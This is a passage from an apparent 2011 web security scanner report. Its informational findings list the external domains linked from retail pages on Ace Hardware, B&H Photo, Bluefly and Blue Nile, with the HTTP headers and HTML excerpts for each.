="window.location.href='/product/index.jsp?productId=11221138&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Rockwell® Blade Runner with Wall Mount (RK7321)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554133th.jpg"></a>
...[SNIP]...
ow.location.href='/product/index.jsp?productId=11221117&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Twin Draft Guard® 8x15in Magnetic Vent Covers (60260)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554207th.jpg"></a>
...[SNIP]...
43685" onClick="window.location.href='/product/index.jsp?productId=11643685&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 12oz Smart Straw - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-10335417th.jpg"></a>
...[SNIP]...
productId=11636779" onClick="window.location.href='/product/index.jsp?productId=11636779&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 1gal - 4 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202036th.gif"></a>
...[SNIP]...
77" onClick="window.location.href='/product/index.jsp?productId=11636777&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 3oz Spray Lubricant - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202039th.gif"></a>
...[SNIP]...
771" onClick="window.location.href='/product/index.jsp?productId=11636771&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:3-In-1® 3oz Household Oil - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-958748th.gif"></a>
...[SNIP]...


   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/home_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
</a><img border="0" name="AceRewardsVisaLower_042611" src="http://ACE.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png" height="53" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="Ship to Store Logo 100108 2" src="http://ACE.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="Rebate 11-24-08" src="http://ACE.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<div id="homePandS" class="h250 mB10">
                   <img src="http://ACE.imageg.net/images/home_projectsandsolutionsSmall.jpg" alt="" width="199" height="238" border="0" usemap="#home_projectsandsolutions" />
                   <map name="home_projectsandsolutions">
...[SNIP]...
<div id="ace_home_5" style="width:199px;border:0px;overflow:hidden;">
<img border="0" name="social_media_199x53" src="http://ACE.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg" height="53" width="199" align="Default" valign="Default" usemap="#social_map" /><map name="social_map"><area shape="rect" coords="0,0,67,53" title="Facebook" href="http://facebook.com/acehardware"/><area shape="rect" coords="67,0,122,53" title="Twitter" href="http://twitter.com/acehardware"/><area shape="rect" coords="122,0,199,53" title="YouTube" href="http://youtube.com/acehardware"/></map>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<td valign=top><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145" width="1" height="1" border="0"></td>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=45060074?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">


           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...


   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.26. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.acehardware.com/checkout/index.jsp?process=login

The response contains the following links to other domains:

https://dsa.csdata1.com/data/js/9027093/csgather.js
https://images.scanalert.com/meter/www.acehardware.com/31.gif
https://media.gsimedia.net/tg/gsiutt/store133.js
https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



<script src="https://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...
<a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.27. http://www.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The page was loaded from a URL containing a query string:

http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif

The response contains the following links to other domains:

http://hdslr.bhphoto.com/Home.php?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2Guide
http://secure.globalsign.net/en/find/sealct.cfm?id=49947127
http://twitter.com/bhphotovideo
http://www.bbbonline.org/cks.asp?id=121000249
http://www.bhinsights.com/
http://www.bhinsights.com/?cm_sp=Banner-_-HomePage-_-bhinsights
http://www.facebook.com/bhphoto?v=wall
http://www.scanalert.com/RatingVerify?ref=www.bhphotovideo.com
http://www.youtube.com/user/BHPhotoVideoProAudio

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Expires: Mon, 16 May 2011 01:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:52:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; Path=/
Content-Length: 39479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>B&H Photo Vi
...[SNIP]...
<area shape="rect" coords="6,67,159,120" href="http://www.bhphotovideo.com/bnh/controller/home?O=RootPage.jsp&A=getpage&Q=EventSpace.jsp&cm_sp=Banner-_-HomePage-_-EventSpace" alt="In-store events" />
   <area shape="rect" coords="163,6,319,60" href="http://www.bhinsights.com?cm_sp=Banner-_-HomePage-_-bhinsights" target="_blank" alt="BH Insights" />
   <area shape="rect" coords="6,6,159,61" href="http://www.bhphotovideo.com/find/HelpCenter/NYSuperStore08.jsp?cm_sp=Banner-_-HomePage-_-NYsuperStore" alt="store experience" />
...[SNIP]...
ape="poly" coords="317,118,317,66,163,66,163,99,251,99,251,118" href="http://www.bhphotovideo.com/find/hdslr.jsp?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2`HUB" target="_self" alt="HDSLR-View products" />
   <area shape="rect" coords="162,99,252,120" href="http://hdslr.bhphoto.com/Home.php?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2Guide" onclick="subWindowNoScrollBars('hdslrGuideWin', 654, 991);" target="hdslrGuideWin" alt="HDSLR-Online Guide" />
   <area shape="rect" coords="324,5,478,99" href="https://secure.bhphotovideo.com/bnh/controller/home/?O=LeftNavBar&A=signUp&Q=" target="_self" alt="Email subscription" />
...[SNIP]...
<li><a name="B&H_Insights" href="http://www.bhinsights.com" onclick="return widgets.popup(this, 'profiles.insights');" >B&H Insights Blog</a>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/bhphoto?v=wall" alt="Facebook" target="blank">Facebook</a>
...[SNIP]...
<li><a class="twitter" href="http://twitter.com/bhphotovideo" alt="Twitter" target="blank">Twitter</a>
...[SNIP]...
<li><a class="youTube" href="http://www.youtube.com/user/BHPhotoVideoProAudio" alt="You Tube" target="blank">You Tube</a>
...[SNIP]...
<li class="hackerSafe"><a class="hackerSafeLink" onclick="return widgets.popup(this, 'Mcafee', 'width=560px, scrollbars=yes');" target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.bhphotovideo.com" rel="nofollow">McAfee Secure - Tested Daily</a>
...[SNIP]...
<li class="cyberTrust"><a class="cyberTrustLink" onclick="return widgets.popup(this, 'Cyberrust', 'width=810px, scrollbars=yes');" href="http://secure.globalsign.net/en/find/sealct.cfm?id=49947127" target="_blank" rel="nofollow">Cybertrust - Secured Website</a>
...[SNIP]...
<li class="bbbOnline"><a class="bbbOnlineLink" onclick="return widgets.popup(this, 'BBB', 'width=800px, height=480px, scrollbars=yes');" href="http://www.bbbonline.org/cks.asp?id=121000249" target="_blank" rel="nofollow">BBB - Accredited Business</a>
...[SNIP]...

17.28. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4

The response contains the following links to other domains:

http://twitter.com/bluefly_com
http://www.blueflyclosetconfessions.com/
http://www.facebook.com/Bluefly
http://www.facebook.com/bluefly
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21
http://www.twitter.com/bluefly_com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www
...[SNIP]...
<div id="social_fb_like">
               <a href="http://www.facebook.com/bluefly" alt="Bluefly on Facebook" title="Bluefly on Facebook"><img src="https://media.bluefly.com/media/templates/images/footer/social_new/fb-icon.png" alt="Bluefly on Facebook" border="0" />
...[SNIP]...
</a>
               <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div id="social_twitter">
               <a href="http://www.twitter.com/bluefly_com" alt="Follow us on Twitter" title="Follow us on Twitter"><img src="https://media.bluefly.com/media/templates/images/footer/social_new/twitter-icon.png" alt="Follow us on Twitter" border="0" />
...[SNIP]...
<li><a href="http://www.facebook.com/Bluefly">bluefly on facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/bluefly_com">bluefly on twitter</a>
...[SNIP]...
</a>, <a href="http://www.blueflyclosetconfessions.com">celebrity closets</a>
...[SNIP]...

17.29. http://www.bluenile.com/build-your-own-diamond-ring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The page was loaded from a URL containing a query string:

http://www.bluenile.com/build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more

The response contains the following links to other domains:

http://byor.jsp/?forceStep=DIAMONDS_STEP
http://connect.facebook.net/en_US/all.js
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png
http://view.atdmt.com/action/BlueNile_Build_your_own_ring
http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564
http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html
http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38
http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report
http://www.cnbc.com/id/39187922
http://www.economist.com/business/displaystory.cfm?story_id=10881758
http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63
http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en
https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html
https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<div class="back-to-search" id="back-to-search" style="display:none;"><a class="ajax-transition back-search-link" href="//byor.jsp?forceStep=DIAMONDS_STEP"><img height="14px" width="14px" src="http://pics.bluenile.com/assets/chrome/but/but_bigBlue_arrow_back.gif">
...[SNIP]...

<img height="1" width="1" src="http://view.atdmt.com/action/BlueNile_Build_your_own_ring"/>
<div id="footer-international-placeholder">
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div id="in-the-news-item-1" class="in-the-news-item" style="display:block;">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_businessweek_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<h3>
...[SNIP]...
<div id="in-the-news-item-2" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_npr_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<h3>
...[SNIP]...
<div id="in-the-news-item-3" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_economist_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<h3>
...[SNIP]...
<div id="in-the-news-item-4" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_kiplingers_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<h3>
...[SNIP]...
<div id="in-the-news-item-5" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_cnbc_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<h3>
...[SNIP]...
<p>
We offer both <a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html',600,620,true,true,false);">Bill Me Later®</a>
and <a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html',600,620,true,true,false);">Blue Nile® Preferred Financing</a>
...[SNIP]...
<div class="footer_flag_icon">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" align="absmiddle" width="26" height="17">
...[SNIP]...
<div class="flag-column">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
<img src="/assets/chrome/items/item_icon_ca_flag_shad.gif" border="0" width="26" height="17" />
...[SNIP]...
<li>
<a href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html" rel="nofollow"><img width="76" height="44" src="http://img.bluenile.com/is/image/bluenile/coe_logo_horiz_10" alt="Biz Rate 2010">
...[SNIP]...
<li>
<a href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE" rel="nofollow"><img width="70" height="36" src="http://img.bluenile.com/is/image/bluenile/logo4" alt="Nasdaq">
...[SNIP]...
<li>
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en" rel="nofollow"><img width="53" height="34" src="http://img.bluenile.com/is/image/bluenile/logo5" alt="Verisign">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html',600,620,true,true,false);"><img width="64" height="39" src="http://img.bluenile.com/is/image/bluenile/logo7" alt="Bill Me Later...">
...[SNIP]...
<li>
<a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html',600,620,true,true,false);"><img width="120" vspace="7" height="40" src="/assets/chrome/bug/bnpreferred_sm_120x40.gif" alt="Blue Nile... Preferred Financing">
...[SNIP]...
<noscript>
<a style="padding: 0px; margin: 0pt auto;" title="Blue Nile Inc, Jewelers - Retail, Seattle, WA" href="http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564#bbblogo" class="rbhzbus" id="bbblink" target="_blank"><img width="200" height="38" alt="Blue Nile Inc, Jewelers - Retail, Seattle, WA" src="http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png" id="bbblinkimg" style="padding: 0px; border: medium none;"></a>
...[SNIP]...
<li><a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8">Careers</a>
...[SNIP]...

17.30. http://www.bluenile.com/engagement-rings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/engagement-rings

Issue detail

The page was loaded from a URL containing a query string:

http://www.bluenile.com/engagement-rings?track=head

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png
http://view.atdmt.com/action/BlueNile_Engagement_ring
http://www.bbb.org/western-washington/business-reviews/jewelers-retail/blue-nile-in-seattle-wa-15026564
http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html
http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38
http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report
http://www.cnbc.com/id/39187922
http://www.economist.com/business/displaystory.cfm?story_id=10881758
http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63
http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en
https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html
https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html

Request

GET /engagement-rings?track=head HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:26 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 76503

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="htt
...[SNIP]...

<img height="1" width="1" src="http://view.atdmt.com/action/BlueNile_Engagement_ring"/>

...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div id="in-the-news-item-1" class="in-the-news-item" style="display:block;">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_businessweek_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.businessweek.com/magazine/content/08_23/b4087039014145.htm?chan=magazine+channel_special+report">
<h3>
...[SNIP]...
<div id="in-the-news-item-2" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_npr_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.npr.org/templates/story/story.php?storyId=123605024&ps=cprs">
<h3>
...[SNIP]...
<div id="in-the-news-item-3" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_economist_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.economist.com/business/displaystory.cfm?story_id=10881758">
<h3>
...[SNIP]...
<div id="in-the-news-item-4" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_kiplingers_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.kiplinger.com/features/archives/2006/11/diamonds.html?kipad_id=63">
<h3>
...[SNIP]...
<div id="in-the-news-item-5" class="in-the-news-item">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<img height="40" width="40" class="in-the-news-logo" src="/assets/chrome/bug/bug_cnbc_news40x40.jpg">
...[SNIP]...
<div class="in-the-news-content">
<a rel="nofollow" target="_blank" href="http://www.cnbc.com/id/39187922">
<h3>
...[SNIP]...
<p>
We offer both <a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html" target="_blank" onclick="return createPopup('bill_me_later','https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html',600,620,true,true,false);">Bill Me Later®</a>
and <a rel="nofollow" href="https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html" target="_blank" onclick="return createPopup('preferred_financing','https://www.securecheckout.mypreferredaccount.com/paycapture-content/fetch?hash=PAP288AN&content=/bluenileweb/bnpaiw.html',600,620,true,true,false);">Blue Nile® Preferred Financing</a>
...[SNIP]...
<div class="footer_flag_icon">
<a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
